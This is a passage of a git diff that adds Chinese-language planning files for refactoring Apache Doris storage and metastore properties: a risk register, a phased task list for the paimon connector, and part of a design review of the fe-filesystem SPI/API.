白名单(+FileSystemPluginManager)、decisions D-009、risks R-004、tasks P0-T01/P0-T02。 + - **A(荐)**:守 D-003 架构(连接器消费 fe-filesystem-api typed StorageProperties)。在 fe-core `FileSystemPluginManager` 加 additive `public List bindAll(Map)`(镜像 `createFileSystem`),`DefaultConnectorContext.getStorageProperties()` 调它(raw map 经 `getOrigProps()` 取,不碰构造点)。fe-core 改动 = DefaultConnectorContext + FileSystemPluginManager 两文件、均纯新增。 + - **B**:同架构,但 `bindAll` 放 fe-filesystem-spi 静态(ServiceLoader)→ fe-core 仅改 DefaultConnectorContext;代价=改 fe-filesystem-spi(同样白名单外)+ 仅见内置 provider(storage 足够)。 + - **C(更简、偏离 D-003)**:不下发 typed 对象;加 `ConnectorContext.getStorageHadoopConfig(): Map`,fe-core 用现有 typed map 单点算(与 hive/iceberg 同源、零漂移),paimon 调它。改动**确可**局限 DefaultConnectorContext 单文件;但连接器**不再**依赖 fe-filesystem-api(放弃 D-003 的「fe-connector → 仅 fe-filesystem-api」目标边)。 +- **影响范围**:P0-T01 结论、P0-T02 / P1-T02 / P1-T03 / P1-T04 的绑定机制与白名单;不影响 P2/P3a。 diff --git a/plan-doc/metastore-storage-refactor/risks.md b/plan-doc/metastore-storage-refactor/risks.md new file mode 100644 index 00000000000000..96e31f5e439462 --- /dev/null +++ b/plan-doc/metastore-storage-refactor/risks.md @@ -0,0 +1,38 @@ +# 风险登记册(滚动状态) + +> 编号 `R-NNN` **仅在本子项目内有效**。状态:监控中 / 缓解中 / 已闭环 / 已触发。 +> 风险=可能发生(在此);问题=已发生(记在 `tasks.md` 对应 task 的 blocker)。 + +--- + +## R-001 — 新旧 Storage 配置/BE map 等价性漂移 | 状态:监控中 +- **描述**:新 `toHadoopConfigurationMap()`/`toBackendProperties().toMap()` 与 fe-core 旧 `getHadoopStorageConfig()`/`getBackendConfigProperties()` 可能在某些键/默认值上不一致。已知默认调优值分叉:S3=50/3000/1000 vs OSS/COS/OBS=100/10000/10000。 +- **影响**:paimon 读私有桶 403、Hadoop FS 行为变化、静默错误。 +- **缓解**:**T1 等价性测试**(P1-T03/T06 强制,逐键逐值对照,含默认调优值)。 +- **触发判据**:T1 任一键/值不等。 + +## R-002 — 双 Storage 路径并存窗口 | 状态:监控中 +- **描述**:迁移期 fe-core 旧 storage(hive/hudi/iceberg 用)与 fe-filesystem 新 storage(paimon 用)并存;同一 catalog 若两路推出不同配置会冲突。 +- **影响**:配置/凭据不一致。 +- **缓解**:paimon **完全**切到新路(P1 全 task 完成)即隔离;本项目不动其它连接器(D-005),天然不交叉。 +- **触发判据**:paimon catalog 出现 connector 侧与 engine 侧配置分歧。 + +## R-003 — 打包 / 类加载(relocated thrift + child-first)| 状态:监控中 +- **描述**:HMS/DLF 活连接需 relocated thrift(`fe-connector-paimon-hive-shade`)build-order 在前 + child-first hadoop/aws bundling。新建/改动模块时若破坏,会重现 S3A/thrift 跨 classloader cast 崩溃(历史 bug)。 +- **影响**:docker paimon HMS/DLF flavor 运行期崩。 +- **缓解**:模块改动保持 shade build-order 与 child-first/parent-first 白名单不变;**T4 docker 5 flavor** 覆盖 HMS/DLF。 +- **触发判据**:docker HMS/DLF 启动报 ClassCastException / NoClassDefFound(thrift/S3A)。 + +--- + +## R-004 — fe-core 改动越界 | 状态:监控中(白名单 2026-06-17 +1,DV-001/D-009) +- **描述**:本项目允许的 fe-core 改动**仅两处、均纯新增**:`DefaultConnectorContext`(+getStorageProperties)与 `FileSystemPluginManager`(+bindAll,D-009 应对 DV-001)。若实现时顺手碰了 `datasource.property.*` 包、`FileSystemPluginManager` 既有方法、或构造点 `PluginDrivenExternalCatalog` 即越红线。 +- **缓解**:每次提交前 `git diff --name-only` 对照 WORKFLOW §4.1 白名单;`git diff` 这两文件须只见**新增**(bindAll / getStorageProperties),无既有方法改动;验收 §6「零改动核对」。 +- **触发判据**:`git diff` 出现 fe-core property 包、其它连接器路径、或这两文件的非新增改动。 + +## R-005 — Kerberos 三处实现漂移(D-007)| 状态:监控中 +- **描述**:kerberos 现有**三处实现**:fe-common `security.authentication.*`、fe-filesystem-hdfs 自抄 `KerberosHadoopAuthenticator`(约一年前拷贝、TGT 刷新逻辑可能已偏离)、paimon `PaimonCatalogFactory` 手抄 HMS kerberos HiveConf 键。改一处需同步三处,否则行为分叉。 +- **影响**:kerberized HMS/HDFS 鉴权行为不一致;UGI 刷新/JVM-全局锁语义分叉;安全相关静默失败。 +- **缓解**:D-007 抽 `fe-kerberos` 单一真相源;**P3a(本次)paimon 先收口**到 fe-kerberos;**P3b(follow-up)** fe-common + fe-filesystem-hdfs 全量收口并统一两个 `HadoopAuthenticator` 接口(`PrivilegedExceptionAction` vs `IOCallable`),与 hive/iceberg 同批。**过渡期(P3a 后、P3b 前)三处副本仍在**,须知晓改一处需同步。 +- **触发判据**:三处之一改动未同步导致 kerberos e2e(HMS/HDFS)行为不一致。 +- **范围注**:全量去重(P3b)改 fe-common + fe-filesystem-hdfs,超出 D-005「只动 paimon」,属 follow-up。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md new file mode 100644 index 00000000000000..18e93ea42835d0 --- /dev/null +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -0,0 +1,110 @@ +# 任务清单(Pn-Tnn) + +> 状态:⬜ 未开始 | 🚧 进行中 | ✅ 完成 | ⛔ blocked。 +> 编号永不复用。每完成一个 task 按 `WORKFLOW.md §2.8` 同步文档。 +> 设计依据:`../designs/metastore-storage-property-refactor-design-2026-06-17.md`(节号见各 task)。 + +--- + +## P0 — 准备 + +### P0-T01 ✅ 确认 fe-filesystem-api 已满足连接器消费需求(recon + 定向完成) +- **做什么**:核对 `fe-filesystem-api` 的 `StorageProperties.toHadoopProperties().toHadoopConfigurationMap()` 与 `toBackendProperties().toMap()` 能覆盖 paimon `applyStorageConfig` / BE 凭据所需的全部键(S3/OSS/COS/OBS/HDFS)。 +- **验收**:列出新 api 产物 vs 现 paimon 经 fe-property 得到的键,差异清单为空或有结论(缺则记 deviation 决定补在哪)。~~**结论预期:无需给 api 加静态门面**~~(**已证伪**,见下)。 +- **依赖**:无。设计 §4 P0-1 / §2.1。 +- **结论(2026-06-17 recon,见 DV-001)**: + - **F1 等价性 = 非阻塞**:fe-filesystem `toHadoopConfigurationMap()`/`toMap()` 与 paimon 现走的 fe-property 路在**静态凭据常见路径全等**(COS 完全相同;OSS/OBS 相同;含 jindo/cosn/obs 块);fe-filesystem 为**超集**(S3 assume-role/anon 额外键;OSS/COS/OBS endpoint/region 无条件 vs 懒发)。→ 认 fe-filesystem 为新事实源,T1 钉常见路径全等 + 记超集差异。 + - **F2 可行性 = 阻塞**:**无** raw map → `List` 的 bind-all 入口(provider registry 私有,仅首个命中 `createFileSystem`)。`getStorageProperties()` **无法**只改 `DefaultConnectorContext`,须额外 additive `bindAll(...)`(fe-core `FileSystemPluginManager` 或 fe-filesystem-spi)。**白名单假设被推翻** → 需用户定向 + 最小扩张(DV-001 三选项,已 AskUserQuestion)。 +- **✅ 定向(用户 2026-06-17)**:选机制 **A**(DV-001 → D-009)——bind-all 落 fe-core `FileSystemPluginManager.bindAll`,`getStorageProperties()` 经 `getOrigProps()` 取 raw map、不碰构造点。白名单 +`FileSystemPluginManager.java`(仅新增)。P0-T01 闭环;进入 P0-T02。 + +### P0-T02 ⬜ fe-core FileSystemPluginManager 新增 bindAll(raw map → List) +- **做什么**(D-009):在 fe-core `FileSystemPluginManager` 加 additive `public List bindAll(Map)`:遍历已注册 providers,对 `supports(props)` 命中者调 `provider.bind(props)` **全量收集**(非首个命中),返回 `List`(`FileSystemProperties extends StorageProperties`,故 bind 产物 IS-A 目标类型)。**仅新增方法,不动 `createFileSystem` 等既有方法。** +- **验收**:单测:给定 S3/OSS/HDFS 等代表性 raw props,`bindAll` 返回非空、类型正确、覆盖期望后端的列表(与 fe-core 旧 `StorageProperties.createAll` 选中的后端集合对齐);空/无匹配返回空列表不抛。`createFileSystem` 行为零回归。fe-core 旧 `datasource.property.storage` 包 + fe-filesystem 模块零改动。 +- **依赖**:无(∥ P1-T01)。设计 §4 P0-2 / §2.1 / **D-009 / DV-001**。**红线**:仅改 `FileSystemPluginManager.java`(新增 bindAll)。 + +--- + +## P1 — paimon storage 收口到 fe-filesystem-api(纯新增/迁移) + +### P1-T01 ⬜ ConnectorContext 新增 getStorageProperties() +- **做什么**:`fe-connector-spi` 的 `ConnectorContext` 加 `default List getStorageProperties() { return List.of(); }`(fe-filesystem-api 类型)。pom 增 `fe-connector-spi → fe-filesystem-api`。 +- **验收**:编译通过;**这条边即"fe-connector 依赖 fe-filesystem-api"落地**;其它连接器零影响(默认空)。 +- **依赖**:无。设计 §4 P1-1 / §3.2。**红线**:仅改 `ConnectorContext.java` + `fe-connector-spi/pom.xml`。 + +### P1-T02 ⬜ DefaultConnectorContext.getStorageProperties() 实现 +- **做什么**(D-009):fe-core `DefaultConnectorContext` override `getStorageProperties()`:从现有 `storagePropertiesSupplier.get()` 取任一 fe-core typed 值的 `getOrigProps()`(= 完整 catalog raw map),喂 `FileSystemPluginManager.bindAll(rawMap)`(P0-T02)返回 fe-filesystem `List`。supplier 空(REST/vended、非 plugin ctor)→ 返回空列表(无静态 storage,正确)。**不改构造点。** +- **验收**:paimon catalog 下 `ctx.getStorageProperties()` 返回正确 typed 列表;hive/iceberg/其它连接器行为不变(默认空)。需确认 fe-core `createAll` 各实例 `origProps` = 完整 raw map(实现时读 `createAll`+ctor 核实)。 +- **依赖**:P1-T01, P0-T02。设计 §4 P1-2 / **D-009**。**红线**:fe-core 仅此文件新增 `getStorageProperties()`(bindAll 在 P0-T02 的 FileSystemPluginManager)。 + +### P1-T03 ⬜ PaimonCatalogFactory.applyStorageConfig 改走 toHadoopConfigurationMap +- **做什么**:把 `fe-property StorageProperties.buildObjectStorageHadoopConfig(props)` 换成"遍历 `ctx.getStorageProperties()` 调 `toHadoopProperties().toHadoopConfigurationMap()`";**保留**其后的 `paimon.*/fs./dfs./hadoop.` 覆盖块(保序 last-write-wins)。 +- **验收**:T1 等价性测试通过(新 HiveConf/Configuration 键值 == 旧);HMS/DLF HiveConf 的 kerberos 条件键仍在 storage 叠加之后。 +- **依赖**:P1-T01(签名),调用侧需 ctx 传入(P1-T02 提供运行期值,UT 可注入)。设计 §4 P1-3 / §5 R1。 + +### P1-T04 ⬜ PaimonScanPlanProvider BE 静态凭据改走 toBackendProperties().toMap() +- **做什么**:BE 静态凭据从 `ctx.getBackendStorageProperties()` 改为遍历 `getStorageProperties()` 调 `toBackendProperties().toMap()`。vended 动态路径**不动**(仍 `ctx.vendStorageCredentials`)。 +- **验收**:T1 BE map 等价;vended(REST/DLF) 路径回归不变。 +- **依赖**:P1-T01。设计 §4 P1-4 / §2.2。 + +### P1-T05 ⬜ 断开 paimon → fe-property 依赖边 +- **做什么**:删 `fe-connector-paimon/pom.xml` 的 `fe-property` 依赖 + `PaimonCatalogFactory:20` 的 import。 +- **验收**:`grep -r 'org.apache.doris.property' fe/fe-connector/fe-connector-paimon/src` == 0;模块编译通过。**fe-property 模块本身不删**(变 0 消费者孤儿)。 +- **依赖**:P1-T03, P1-T04。设计 §4 P1-5 / §0.1。 + +### P1-T06 ⬜ P1 验证 +- **做什么**:paimon UT 全绿;docker `enablePaimonTest=true` 5 flavor;T1 等价性测试。 +- **验收**:见 WORKFLOW §5;若不跑 docker 明确标注"未跑 e2e"。 +- **依赖**:P1-T02..T05。设计 §4 P1-6 / §5 T1,T4。 + +--- + +## P2 — MetaStore Property SPI + paimon adapter(纯新增/迁移) + +### P2-T01 ⬜ 新建 fe-connector-metastore-api +- **做什么**:新模块(依赖 fe-foundation + fe-filesystem-api):`MetaStoreProperties`(`String providerName()` + 能力方法 `needsStorage()`/`needsVendedCredentials()`,**无 per-backend 枚举**,D-006)+ 子接口 **HMS/DLF/REST/JDBC/FileSystem**(中立 Map/标量,不暴露 HiveConf/SDK 类型)。**不实现 Glue/S3Tables**(iceberg/hive 专用,留扩展)。 +- **验收**:模块编译;接口签名对齐设计 §3.1(**确认无 `MetaStoreType` 枚举**);新模块声明进 `fe-connector/pom.xml`。 +- **依赖**:无。设计 §4 P2-1 / §3.1 / **D-006**。 + +### P2-T02 ⬜ 新建 fe-connector-metastore-spi(共享后端解析器 + Provider 发现) +- **做什么**:新模块(依赖 metastore-api + fe-foundation + fe-filesystem-api):`Hms/Dlf/Rest/Jdbc/FileSystem MetastoreBackend.parse(raw, storageList)` + `JdbcDriverSupport` + `@ConnectorProperty` typed holders;**+ `MetaStoreProvider

      ` SPI(`supports(Map)` 自识别 + `bind`)+ 5 个内置 provider + 各自 `META-INF/services` + `MetaStoreProviders.bind(...)` 派发**(D-006,镜像 `FileSystemProvider`/`FileSystemPluginManager`)。来源 = 上移 paimon 现有 `PaimonCatalogFactory` 手抄逻辑(去 fe-core 化)。**fe-core 旧类不动**。 +- **验收**:T2 等价性测试通过(解析产物 == 旧 `Paimon*MetaStoreProperties`);`@ConnectorProperty` 别名/required/sensitive 生效;`MetaStoreProviders.bind` 经 `supports()` 正确选中 5 后端(**无 per-backend 枚举/中心 switch**)。 +- **依赖**:P2-T01。设计 §4 P2-2 / §3.2 / §5 T2 / **D-006**。 + +### P2-T03 ⬜ paimon adapter 改造 +- **做什么**:`PaimonCatalogFactory` 的 `buildHmsHiveConf`/`buildDlfHiveConf`/`validate`/别名常量 → 调共享 `*MetastoreBackend.parse` + 薄 paimon Options/HiveConf 组装;删 `PaimonConnectorProperties` 别名数组。 +- **验收**:paimon 5 flavor UT 全绿;adapter 不再含手抄连接逻辑(代码评审 + 行数显著下降)。 +- **依赖**:P2-T02。设计 §4 P2-3 / §3.3。 + +### P2-T04 ⬜ paimon pom + gate 核对 +- **做什么**:paimon pom 增 `fe-connector-metastore-api/spi`;`grep` 确认 paimon 无 fe-core import;CI gate 通过。 +- **验收**:`tools/check-connector-imports.sh` PASS;paimon 仅依赖 `fe-connector-{api,spi,metastore-api,metastore-spi}` + `fe-filesystem-api` + `fe-thrift(provided)` + SDK。 +- **依赖**:P2-T03。设计 §4 P2-4。 + +### P2-T05 ⬜ P2 验证 +- **做什么**:paimon UT + docker 5 flavor + T2 等价性 + vended(REST/DLF) + Kerberos HMS。 +- **验收**:见 WORKFLOW §5;不跑 docker 则标注"未跑 e2e"。 +- **依赖**:P2-T03, P2-T04。设计 §4 P2-5 / §5 T2,T4。 + +--- + +## P3 — Kerberos 收口到 fe-kerberos 叶子模块(D-007;⚠️ 范围张力,见下) + +> **范围说明(用户 2026-06-17 确认)**:拆为 **P3a(paimon-local,✅ 纳入本次)** 与 **P3b(全量去重,follow-up,范围外)**。P3a 纯新增 + 只让 paimon 走新模块,不碰 fe-common/fe-filesystem-hdfs 既有路径 → 符合 D-005;P3b 会改 fe-common + fe-filesystem-hdfs,超出 D-005,与 hive/iceberg 迁移同批,本清单仅占位。 +> **归属/命名已定(D-007)**:顶层中立叶子 **`fe-kerberos`**(**非** fe-connector-*,否则破 `fe-filesystem ↛ fe-connector` gate + fe-common 层级倒挂)。 + +### P3a-T01 ⬜ 新建 fe-kerberos 叶子模块(仅 paimon 用) +- **做什么**:新建顶层模块 `fe-kerberos`(依赖**仅** hadoop-auth/hadoop-common;trino `KerberosTicketUtils` 用 JDK `javax.security.auth.kerberos` 等价替换)。**本步只承载 paimon HMS 所需**的 kerberos facts 载体(`KerberosAuthSpec` + 必要的 `AuthenticationConfig`/`HadoopAuthenticator` 子集),供 `fe-connector-metastore-spi` 的 `HmsMetastoreBackend` 产出 facts。**不碰 fe-common / fe-filesystem-hdfs 既有路径**。 +- **验收**:模块编译、零 fe-core/fe-connector/fe-filesystem import(纯叶子,gate);paimon HMS kerberos facts 经 fe-kerberos 类型表达;真正 `UGI.doAs` 仍走 `ctx.executeAuthenticated`(§5 不变量 4);fe-common/fe-filesystem-hdfs 既有 kerberos 路径**零改动**(§6 零改动核对)。 +- **依赖**:P2-T02(facts 消费方)。设计 §3.5 / **D-007 步骤 a**。**✅ 纳入本次(用户 2026-06-17 确认)。** + +### P3b-T01 ⬜(follow-up,本次不做)全量去重:fe-common + fe-filesystem-hdfs 收口到 fe-kerberos +- **做什么**:把 fe-common `security.authentication.*` 整套搬入 fe-kerberos 作唯一真相源(fe-common 重指向);删 fe-filesystem-hdfs 自有 `KerberosHadoopAuthenticator`、改依赖 fe-kerberos;统一两个 `HadoopAuthenticator` 接口(`PrivilegedExceptionAction` vs `IOCallable`)。 +- **验收**:三处实现合一;全 FE 编译 + kerberos e2e(HMS/HDFS)。 +- **依赖**:P3a-T01 + hive/iceberg 迁移批次。设计 §3.5 / **D-007 步骤 b**。**范围外(与 D-005 张力),独立任务。** + +--- + +## 阶段日志(append-only) +- 2026-06-17:创建任务清单(P0×2 / P1×6 / P2×5),状态全 ⬜,待用户批准后开始 P1。 +- 2026-06-17:3 设计点定稿(D-006 provider 取代 MetaStoreType 枚举 / D-007 fe-kerberos 叶子 / D-008 vended 边界);P2-T01/T02 改写(去枚举、加 MetaStoreProvider);新增 P3a/P3b(Kerberos)。 +- 2026-06-17:用户确认 **P3a 纳入本次** + 模块名 **`fe-kerberos`**。核心任务计数 13 → **14**(+P3a-T01);P3b 仍 follow-up(范围外占位)。 diff --git a/plan-doc/reviews/fe-filesystem-storage-spi-review-2026-06-17.md b/plan-doc/reviews/fe-filesystem-storage-spi-review-2026-06-17.md new file mode 100644 index 00000000000000..3009079ba79040 --- /dev/null +++ b/plan-doc/reviews/fe-filesystem-storage-spi-review-2026-06-17.md @@ -0,0 +1,430 @@ +# fe-filesystem 存储属性 SPI/API 设计调研与评审报告 + +> 对象:commit `2a113a6` `[feat](fs) Add native filesystem SPI for object storage (#63400)` +> 范围:新引入的 `fe-filesystem` 多模块存储属性模型(`org.apache.doris.filesystem.properties.*`)与旧的 +> `fe-core` 胖抽象类模型(`org.apache.doris.datasource.property.storage.*`)的异同、SPI/API 设计评审、以及后续使用指南。 +> 日期:2026-06-17 +> 方法:6 路并行只读取证 + 3 路对抗式设计评审(解耦 / 接口工效 / 清晰度与迁移完整性),关键结论已用 `grep` 独立交叉核验。 + +--- + +## 0. 一句话结论(TL;DR) + +**新模型在“架构解耦”上是教科书级别的(纯 JDK 的 api 层、零 fe-core 回边、按 provider 拆模块、运行期插件加载),但在“是否真正被使用”上目前是休眠(dormant)状态——`fe-core` 对新 `filesystem.properties.*` 的引用为 0,线上链路仍然走旧的胖类模型经 `StoragePropertiesConverter` 拍平成 `Map` 的老路。** 因此: + +- 解耦/分层质量:高(9/10 级别)。 +- 接口命名与一致性:偏低(4/10)——三处同名 `StorageProperties`、双接口冗余、能力模型与类型枚举尚无消费者。 +- 迁移完整性:很低(3/10)——“删除 fe-core 的 StorageProperties”短期不现实,被 83 个调用方 + 转换桥 + 40 处 BE/Hadoop 配置生成点阻塞。 + +> **重要澄清(与提问表述的偏差,按事实修正)** +> 1. 这并不是一次简单的“搬家”。新的 `fe-filesystem` 版本是**重新设计**:旧 `StorageProperties` 是 `abstract class`,新 `StorageProperties` 是 `interface`,形状与职责都不同。 +> 2. 仓库里**同时存在三套**“StorageProperties”:旧的 `fe-core`(在用)、本次新增的 `fe-filesystem`(休眠)、以及给 paimon 用的 `fe-property` 模块里的近似拷贝(commit `70e934d`,与 fe-core 版本逐字不同)。删除 fe-core 版本前,必须先把这三套理清楚。详见 §7。 + +--- + +## 1. 背景与动机 + +PR #63400 的目标是:**不再假设所有对象存储都能永久地通过 AWS S3 兼容协议访问**。动机(摘自 commit message): + +- AWS S3 SDK v2 2.30+ 行为变更,国产云厂商适配滞后; +- 旧版 AWS SDK 有 CVE,不可长期停留; +- Catalog FileIO 依赖 Hadoop,而 Hadoop 3.4 停维、3.5 又抬高了 AWS SDK 的最低版本要求,会反向逼迫 Doris 升级 SDK; +- OBS 私有化部署 / OBS 并行文件系统在 S3 兼容语义下出现签名错误,必须使用厂商原生 SDK。 + +为此该 PR 在 FE 侧引入了一套“原生 SDK 对象存储” SPI:`S3FileSystem` 保留对象存储的通用文件语义,具体 I/O 下沉到各厂商的 `ObjStorage` 实现;同时**顺带引入了一套全新的、provider 自持的、强类型存储属性模型**——这正是本报告关注的 `StorageProperties` / `FileSystemProperties` 体系。 + +本次 commit 共改动 **89 个文件**,但对 `fe-core` 的侵入很小(见 §6):核心的新增内容都落在 `fe/fe-filesystem/` 的多模块树里。 + +--- + +## 2. 旧模型:`fe-core` 的胖抽象类体系 + +位置:`fe/fe-core/src/main/java/org/apache/doris/datasource/property/storage/` + +### 2.1 结构 + +``` +ConnectionProperties (abstract, 持有原始 Map + 反射绑定) + └─ StorageProperties (abstract class) ← 旧的 "StorageProperties" + ├─ AbstractS3CompatibleProperties (implements ObjectStorageProperties) + │ ├─ S3Properties / OSSProperties / OBSProperties / COSProperties / MinioProperties / GCSProperties / OSSHdfsProperties + │ └─ ... + ├─ HdfsCompatibleProperties → HdfsProperties + ├─ AzureProperties / BrokerProperties / LocalProperties / HttpProperties / OzoneProperties +``` + +这是一个**继承(而非组合)**的“胖基类”:工厂、校验、BE/Hadoop 转换、类型探测全部熔进抽象基类与 `AbstractS3CompatibleProperties`,子类只重写若干钩子。 + +### 2.2 职责(全部塞在基类里) + +| 职责 | 实现位置 | +|---|---| +| 原始参数绑定 | `@ConnectorProperty(names=…)` 注解 + `ConnectorPropertiesUtils.bindConnectorProperties`(反射)| +| 别名匹配 | 每个逻辑属性声明多个别名 key,首个命中者胜(`matchedProperties`)| +| 校验 | `checkRequiredProperties()`(反射 required 字段)+ 子类规则 | +| **类型探测 + 多实例工厂** | 静态 `createAll` / `createPrimary` 遍历硬编码的 `PROVIDERS` lambda 列表,按 `fs.xx.support` 标志或 `XxxProperties.guessIsMe(props)` 启发式匹配,并在首位兜底注入 `HdfsProperties` | +| toBE | 抽象 `getBackendConfigProperties()`(AWS_* map)+ `AbstractS3CompatibleProperties.generateBackendS3Configuration()` | +| getHadoopStorageConfig | 公有字段 `org.apache.hadoop.conf.Configuration hadoopStorageConfig`,由 `buildHadoopStorageConfig()` 懒构建 | +| 脱敏 | `ConnectorPropertiesUtils.toMaskedString`(`sensitive=true` 字段)| +| URI 规范化 | 抽象 `validateAndNormalizeUri` / `validateAndGetUri` | + +工厂是“类型分发”的心脏(节选): + +```java +public static StorageProperties createPrimary(Map origProps) { + boolean useGuess = !hasAnyExplicitFsSupport(origProps); + for (BiFunction, Boolean, StorageProperties> func : PROVIDERS) { + StorageProperties p = func.apply(origProps, useGuess); + if (p != null) { p.initNormalizeAndCheckProps(); p.buildHadoopStorageConfig(); return p; } + } + throw new StoragePropertiesException("No supported storage type found..."); +} +// PROVIDERS = 硬编码的 HDFS/OSS/S3/OBS/COS/GCS/AZURE/MINIO/OZONE/BROKER/LOCAL/HTTP 探测 lambda 列表 +``` + +### 2.3 旧模型的耦合问题(“为什么不能原样搬走”) + +依赖方向是**反的**:旧模型住在 `fe-core` 里,却又**依赖 `fe-core` 自己的类型**: + +- `common.UserException` / `DdlException` / `common.Config`(`S3Properties` 读 `Config.aws_credentials_provider_version`); +- `cloud.proto.Cloud`(`S3Properties` 构造 `ObjectStoreInfoPB`/`CredProviderTypePB`,Cloud 模式专用); +- `thrift.TS3StorageParam` / `TCredProviderType`(`S3Properties.getS3TStorageParam` 的 toBE thrift 结构); +- `common.security.authentication.HadoopAuthenticator`(`HdfsProperties`); +- `common.CatalogConfigFileUtils`(`ConnectionProperties.loadConfigFromFile`)。 + +最重的耦合集中在 `S3Properties`(Config 标志 + Cloud proto + thrift)和 `HdfsProperties`(Kerberos 认证栈)。其余 S3 兼容子类只碰到 `UserException` 和 Hadoop `Configuration`,相对好搬。 + +> 值得一提的是:**这套模型并不走 GSON 持久化**。`GsonUtils` 没有为 `ConnectionProperties`/`StorageProperties` 注册任何适配器;`CatalogProperty` 只持久化原始的 `@SerializedName("properties")` map,typed 列表是 `volatile`/transient 的,按需通过 `createAll` 重建。**所以删除旧类没有元数据格式迁移成本**——阻塞点纯粹在编译期调用方,不在持久化。 + +--- + +## 3. 新模型:`fe-filesystem` 多模块体系 + +### 3.1 模块与依赖方向(已 `grep` 核验,无环、单向) + +``` +fe-foundation (叶子模块: @ConnectorProperty + ConnectorPropertiesUtils + ParamRules, 零 doris 依赖) +fe-extension-spi (叶子模块: Plugin / PluginFactory) + ▲ + │ +fe-filesystem-api (纯 JDK, "零三方依赖": FileSystem + StorageProperties/FileSystemProperties/ + ▲ BackendStorageProperties/HadoopStorageProperties + StorageKind/BackendStorageKind + capability/*) + │ +fe-filesystem-spi (+ fe-extension-spi: FileSystemProvider

      , ObjStorage, ObjFileSystem, S3CompatibleFileSystem) + ▲ + │ +fe-filesystem-{s3,oss,cos,obs,azure,hdfs,local,broker} (各 provider 实现 + fe-foundation 绑定工具) + +fe-core ──(compile)──► fe-filesystem-api + fe-filesystem-spi +fe-core ──(test)─────► fe-filesystem-local +``` + +关键事实(已核验): + +- `fe-filesystem-api` 的 pom 只在 test scope 引入 JUnit/Mockito,描述里写明 “Zero third-party external dependencies — pure JDK only”;对 `api`/`spi` 主源码做 `grep`,**没有任何 `org.apache.hadoop` / `software.amazon` / `org.apache.thrift` / `fe-core` 的 import**(api 里唯一的 `org.apache.hadoop` 字样是 `HadoopStorageProperties` 的一句 Javadoc,说明“故意不依赖它”)。 +- 8 个 provider 实现模块**已从 `fe-core` 的编译 classpath 移除**(Phase 4 P4.1),改为运行期从 `plugins/filesystem/` 目录由 `FileSystemPluginManager` + `DirectoryPluginRuntimeManager` 加载(child-first + parent-first 白名单 `org.apache.doris.filesystem.`/`software.amazon.awssdk.`/`org.apache.hadoop.`)。即 **fe-core 在编译期根本无法引用任何具体 provider 类**——这是最强形态的解耦。 + +### 3.2 属性契约(api 层,全部是“瘦接口”) + +`StorageProperties` 从“胖抽象类”变成了“瘦接口”,且只用 JDK 类型: + +```java +public interface StorageProperties { + String providerName(); + StorageKind kind(); + FileSystemType type(); + default void validate() {} + Map rawProperties(); + Map matchedProperties(); + default Optional toBackendProperties() { return Optional.empty(); } + default Optional toHadoopProperties() { return Optional.empty(); } +} +``` + +三层接口阶梯: + +- `StorageProperties`(公共契约) +- `FileSystemProperties extends StorageProperties`(“provider 自持的强类型模型”,是 `FileSystemProvider

      ` 的泛型上界) +- `S3CompatibleFileSystemProperties extends FileSystemProperties`(S3 家族共享访问器:endpoint/region/ak/sk/token/roleArn/bucket/… 全部返回原始 `String`,并把易错的 `use_path_style` 解析收敛到唯一一处 `isUsePathStyle()`,非 `true/false` 直接抛异常而不是静默当 false)。 + +两个“转换目标接口”刻意保持中立(只暴露 `Map`,把 Thrift/Hadoop 依赖挡在 api 之外): + +```java +public interface BackendStorageProperties { // 给 BE 的中立 KV;fe-core adapter 负责拼 TS3StorageParam + BackendStorageKind backendKind(); + Map toMap(); +} +public interface HadoopStorageProperties { // 返回 Map 而非 org.apache.hadoop.conf.Configuration + Map toHadoopConfigurationMap(); +} +``` + +三个枚举处于**三个不同的抽象高度**,刻意不混用: + +| 枚举 | 用途 | 取值 | +|---|---|---| +| `StorageKind` | 框架选路/分类 | `OBJECT_STORAGE / HDFS_COMPATIBLE / BROKER / LOCAL / HTTP` | +| `BackendStorageKind` | 选择 FE→BE adapter(比 StorageKind 更细)| `S3_COMPATIBLE / NATIVE / HDFS / BROKER / LOCAL` | +| `FileSystemType` | Doris fs 类型(带 TODO:承认存在 3+ 套竞品定义待统一)| `S3 / HDFS / OFS / JFS / BROKER / FILE / AZURE / HTTP` | + +### 3.3 SPI 层:强类型 provider + 能力模型 + +```java +public interface FileSystemProvider

      extends PluginFactory { + boolean supports(Map properties); // 唯一“便宜、确定”的匹配判断(abstract) + default P bind(Map properties) { throw new UnsupportedOperationException(...); } + default FileSystem create(P properties) throws IOException { throw new UnsupportedOperationException(...); } + default FileSystem createUntyped(FileSystemProperties properties) throws IOException { return create((P) properties); } + FileSystem create(Map properties) throws IOException; // 兼容路径(abstract,当前唯一被 fe-core 调用的) + default Set sensitivePropertyKeys() { return Collections.emptySet(); } + @Override default String name() { return getClass().getSimpleName().replace("FileSystemProvider",""); } + @Override default Plugin create() { throw new UnsupportedOperationException(...); } // 来自 PluginFactory,被迫覆盖抛异常 +} +``` + +设计意图:迁移期 `bind`/`create(P)`/`createUntyped` 是**默认抛异常的 default 方法**,未迁移的 provider 只需实现 `supports(Map)` + `create(Map)` 即可;已迁移的 provider 把 `create(Map)` 写成 `create(bind(props))`。 + +能力模型(`FileSystem` 接口)用 `Optional` 取代 `instanceof` 向下转型: + +```java +default Optional capability(Class capabilityType) { return Optional.empty(); } +default T requireCapability(Class capabilityType) { + return capability(capabilityType).orElseThrow(() -> new UnsupportedOperationException(...)); +} +// 可选能力接口:BatchDeleteCapability / MultipartUploadCapability / PresignedUrlCapability +``` + +### 3.4 具体 provider(以 `S3FileSystemProperties` 为例) + +一个对象同时实现 4 个接口,`toBackend/toHadoop` 直接返回 `this`: + +```java +public final class S3FileSystemProperties implements + FileSystemProperties, BackendStorageProperties, HadoopStorageProperties, S3CompatibleFileSystemProperties { + + @Getter @ConnectorProperty(names = {ENDPOINT,"AWS_ENDPOINT","endpoint","glue.endpoint",...}, required=false) + private String endpoint = ""; + @Getter @ConnectorProperty(names = {SECRET_KEY,"AWS_SECRET_KEY",...}, required=false, sensitive=true) + private String secretKey = ""; + // ... region/accessKey/sessionToken/roleArn/bucket/maxConnections/usePathStyle ... + + public static S3FileSystemProperties of(Map p) { S3FileSystemProperties x = new S3FileSystemProperties(p); x.validate(); return x; } + + @Override public void validate() { // ParamRules 流式校验 + new ParamRules() + .requireTogether(new String[]{accessKey, secretKey}, "s3.access_key and 